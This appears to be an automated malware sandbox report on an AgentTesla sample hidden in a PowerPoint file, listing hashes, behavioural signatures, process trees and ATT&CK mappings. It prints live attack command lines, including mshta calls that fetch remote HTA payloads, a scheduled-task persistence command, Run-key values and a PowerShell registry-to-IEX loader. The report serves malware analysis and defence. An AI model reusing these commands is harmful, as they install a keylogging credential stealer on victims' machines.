agenttesla | 30969a11fe37f466bf5a9501d1c705e48a0073b725371062d9d9f889cc4b8156

General

Target

Remittance_PO-89488484.ppt
Size

62KB
MD5

b89f3f4467df6600138ba12eb1522f95
SHA1

9d2567c6ebb4168b0670d4c00a7986de5c83a719
SHA256

30969a11fe37f466bf5a9501d1c705e48a0073b725371062d9d9f889cc4b8156
SHA512

3a127bd31192a8a7ee67c407887c62b40e1c113ff49a2cc1fae0ea6dd58198c60308ee13898f642d63deaf6ec561e52f15d396fd05f7f5fbf5c66ebdd0b58e55

Score

10^/10

agenttesla keylogger persistence spyware stealer trojan

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

https://j.mp/ghduiqhwdbiiqwgd

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

mshta.exepowershell.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process	3828	4020	mshta.exe	POWERPNT.EXE
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3884	3352	powershell.exe

AgentTesla Payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2184-186-0x00000000004376BE-mapping.dmp	family_agenttesla

Blocklisted process makes network request 13 IoCs

Processes:

mshta.exepowershell.exe

flow	pid	process
34	3828	mshta.exe
35	3828	mshta.exe
37	3828	mshta.exe
39	3828	mshta.exe
41	3828	mshta.exe
43	3828	mshta.exe
44	3828	mshta.exe
46	3828	mshta.exe
49	3828	mshta.exe
50	3828	mshta.exe
52	3828	mshta.exe
53	3828	mshta.exe
56	3884	powershell.exe

Drops file in Drivers directory 1 IoCs

Processes:

aspnet_compiler.exe

description ioc process

File opened for modification C:\Windows\system32\drivers\etc\hosts aspnet_compiler.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	aspnet_compiler.exe

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

mshta.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"mshta\"\"http://1230948%[email protected]/p/backbone15.html\""	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\nunukhaoo = "\"mshta\"\"http://1230948%[email protected]/p/ghostbackup14.html\""	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\DLESOLCRETSAM = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).MSOFFICELO)\|IEX\"\", 0 : window.close\")"	mshta.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\dkkkksakdosexography = "\"mshta\"\"http://1230948%[email protected]/p/razamanaback.html\""	mshta.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 3884 set thread context of 2184 3884 powershell.exe aspnet_compiler.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	pid	process	target process
PID 3884 set thread context of 2184	3884	powershell.exe	aspnet_compiler.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

POWERPNT.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	POWERPNT.EXE

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

2024 schtasks.exe

pid	process
2024	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

POWERPNT.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	POWERPNT.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	POWERPNT.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

POWERPNT.EXE

pid process

4020 POWERPNT.EXE
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exeaspnet_compiler.exe

pid process

3884 powershell.exe
3884 powershell.exe
3884 powershell.exe
2184 aspnet_compiler.exe
2184 aspnet_compiler.exe

pid	process
4020	POWERPNT.EXE

pid	process
3884	powershell.exe
3884	powershell.exe
3884	powershell.exe
2184	aspnet_compiler.exe
2184	aspnet_compiler.exe

Suspicious use of AdjustPrivilegeToken 44 IoCs

Processes:

powershell.exeaspnet_compiler.exe

description	pid	process
Token: SeDebugPrivilege	3884	powershell.exe
Token: SeIncreaseQuotaPrivilege	3884	powershell.exe
Token: SeSecurityPrivilege	3884	powershell.exe
Token: SeTakeOwnershipPrivilege	3884	powershell.exe
Token: SeLoadDriverPrivilege	3884	powershell.exe
Token: SeSystemProfilePrivilege	3884	powershell.exe
Token: SeSystemtimePrivilege	3884	powershell.exe
Token: SeProfSingleProcessPrivilege	3884	powershell.exe
Token: SeIncBasePriorityPrivilege	3884	powershell.exe
Token: SeCreatePagefilePrivilege	3884	powershell.exe
Token: SeBackupPrivilege	3884	powershell.exe
Token: SeRestorePrivilege	3884	powershell.exe
Token: SeShutdownPrivilege	3884	powershell.exe
Token: SeDebugPrivilege	3884	powershell.exe
Token: SeSystemEnvironmentPrivilege	3884	powershell.exe
Token: SeRemoteShutdownPrivilege	3884	powershell.exe
Token: SeUndockPrivilege	3884	powershell.exe
Token: SeManageVolumePrivilege	3884	powershell.exe
Token: 33	3884	powershell.exe
Token: 34	3884	powershell.exe
Token: 35	3884	powershell.exe
Token: 36	3884	powershell.exe
Token: SeIncreaseQuotaPrivilege	3884	powershell.exe
Token: SeSecurityPrivilege	3884	powershell.exe
Token: SeTakeOwnershipPrivilege	3884	powershell.exe
Token: SeLoadDriverPrivilege	3884	powershell.exe
Token: SeSystemProfilePrivilege	3884	powershell.exe
Token: SeSystemtimePrivilege	3884	powershell.exe
Token: SeProfSingleProcessPrivilege	3884	powershell.exe
Token: SeIncBasePriorityPrivilege	3884	powershell.exe
Token: SeCreatePagefilePrivilege	3884	powershell.exe
Token: SeBackupPrivilege	3884	powershell.exe
Token: SeRestorePrivilege	3884	powershell.exe
Token: SeShutdownPrivilege	3884	powershell.exe
Token: SeDebugPrivilege	3884	powershell.exe
Token: SeSystemEnvironmentPrivilege	3884	powershell.exe
Token: SeRemoteShutdownPrivilege	3884	powershell.exe
Token: SeUndockPrivilege	3884	powershell.exe
Token: SeManageVolumePrivilege	3884	powershell.exe
Token: 33	3884	powershell.exe
Token: 34	3884	powershell.exe
Token: 35	3884	powershell.exe
Token: 36	3884	powershell.exe
Token: SeDebugPrivilege	2184	aspnet_compiler.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

POWERPNT.EXE

pid process

4020 POWERPNT.EXE
Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

POWERPNT.EXEaspnet_compiler.exe

pid process

4020 POWERPNT.EXE
4020 POWERPNT.EXE
4020 POWERPNT.EXE
2184 aspnet_compiler.exe

pid	process
4020	POWERPNT.EXE

pid	process
4020	POWERPNT.EXE
4020	POWERPNT.EXE
4020	POWERPNT.EXE
2184	aspnet_compiler.exe

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

POWERPNT.EXEmshta.exepowershell.exe

description	pid	process	target process
PID 4020 wrote to memory of 3828	4020	POWERPNT.EXE	mshta.exe
PID 4020 wrote to memory of 3828	4020	POWERPNT.EXE	mshta.exe
PID 3828 wrote to memory of 2024	3828	mshta.exe	schtasks.exe
PID 3828 wrote to memory of 2024	3828	mshta.exe	schtasks.exe
PID 3884 wrote to memory of 2184	3884	powershell.exe	aspnet_compiler.exe
PID 3884 wrote to memory of 2184	3884	powershell.exe	aspnet_compiler.exe
PID 3884 wrote to memory of 2184	3884	powershell.exe	aspnet_compiler.exe
PID 3884 wrote to memory of 2184	3884	powershell.exe	aspnet_compiler.exe
PID 3884 wrote to memory of 2184	3884	powershell.exe	aspnet_compiler.exe
PID 3884 wrote to memory of 2184	3884	powershell.exe	aspnet_compiler.exe
PID 3884 wrote to memory of 2184	3884	powershell.exe	aspnet_compiler.exe
PID 3884 wrote to memory of 2184	3884	powershell.exe	aspnet_compiler.exe

C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
"C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\Remittance_PO-89488484.ppt" /ou ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4020
- C:\Windows\SYSTEM32\mshta.exe
  "mshta""https://j.mp/ghduiqhwdbiiqwgd"
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:3828
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%[email protected]/p/razamana.html""\"", 0 : window.close"\")
    3⤵
    - Creates scheduled task(s)
    PID:2024

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -noexit ((gp HKCU:\Software).MSOFFICELO)|IEX
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3884
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
  #cmd
  2⤵
  - Drops file in Drivers directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID:2184

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Registry Run Keys / Startup Folder

Scheduled Task

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2024-181-0x0000000000000000-mapping.dmp

Download
memory/2184-187-0x00000000055E0000-0x0000000005ADE000-memory.dmp

Filesize
5.0MB

Download
memory/2184-186-0x00000000004376BE-mapping.dmp

Download
memory/3828-180-0x0000000000000000-mapping.dmp

Download
memory/3884-185-0x0000016EC2BA8000-0x0000016EC2BA9000-memory.dmp

Filesize
4KB

Download
memory/3884-184-0x0000016EC2BA6000-0x0000016EC2BA8000-memory.dmp

Filesize
8KB

Download
memory/3884-183-0x0000016EC2BA3000-0x0000016EC2BA5000-memory.dmp

Filesize
8KB

Download
memory/3884-182-0x0000016EC2BA0000-0x0000016EC2BA2000-memory.dmp

Filesize
8KB

Download
memory/4020-118-0x00007FFA892C0000-0x00007FFA892D0000-memory.dmp

Filesize
64KB

Download
memory/4020-179-0x00000272692B0000-0x00000272692B4000-memory.dmp

Filesize
16KB

Download
memory/4020-123-0x00007FFAA3B80000-0x00007FFAA5A75000-memory.dmp

Filesize
31.0MB

Download
memory/4020-122-0x000002725D760000-0x000002725E84E000-memory.dmp

Filesize
16.9MB

Download
memory/4020-119-0x00007FFAAB2C0000-0x00007FFAACE9D000-memory.dmp

Filesize
27.9MB

Download
memory/4020-114-0x00007FFA892C0000-0x00007FFA892D0000-memory.dmp

Filesize
64KB

Download
memory/4020-117-0x00007FFA892C0000-0x00007FFA892D0000-memory.dmp

Filesize
64KB

Download
memory/4020-116-0x00007FFA892C0000-0x00007FFA892D0000-memory.dmp

Filesize
64KB

Download
memory/4020-115-0x00007FFA892C0000-0x00007FFA892D0000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads